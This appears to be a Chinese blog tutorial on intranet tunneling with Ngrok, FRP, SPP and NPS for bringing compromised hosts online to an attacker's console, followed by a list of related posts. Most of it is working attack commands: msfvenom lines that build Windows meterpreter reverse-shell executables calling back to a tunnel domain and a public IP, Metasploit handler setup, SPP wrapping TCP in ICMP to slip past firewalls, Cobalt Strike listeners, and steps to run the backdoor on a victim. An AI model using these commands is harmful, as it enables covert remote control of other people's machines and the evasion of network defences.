内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm

#内网穿透-Ngrok-入门-上线

https://www.ngrok.cc/

支持的协议:tcp、http、https

支持的类型:正向代理、反向代理

1、服务端配置:

开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道

2、客户端(攻击者主机)连接服务端:

./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器

将下图的内容上传到攻击者主机,

3、客户端生成后门配置监听:

注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0

set lport 2222

run

攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。

攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线

#内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS

等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公

网。

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:

[common]

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

看我这篇文章详细介绍使用

frp搭建隧道-CSDN博客

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,

但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

将后门上传至受害者主机执行

内网穿透-nps-特殊协议-上线

内网渗透---隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客

注意服务端与客户端版本一致

nps默认配置文件使用了80,443,8080,8024端口

80与443端口为域名解析模式默认端口

8080为web管理访问端口

8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123

1、启动

./nps install

./nps

访问vps的8080端口,默认账号密码:admin/123

2、创建客户端,生成密匙

3、添加协议隧道,绑定指向

-客户端:

1、连接服务端:

bash 复制代码
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

攻击者监听自己电脑本地的6666端口

bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
相关推荐
WTT001120 分钟前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜3 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai3 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack4 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云3215 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师5 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
云云3217 小时前
云手机方案全解析
大数据·服务器·安全·智能手机·矩阵
云云3218 小时前
云手机能用来干什么?云手机在跨境电商领域的用途
服务器·线性代数·安全·智能手机·矩阵
云云3218 小时前
云手机方案总结
服务器·线性代数·安全·智能手机·矩阵
m0_748237058 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全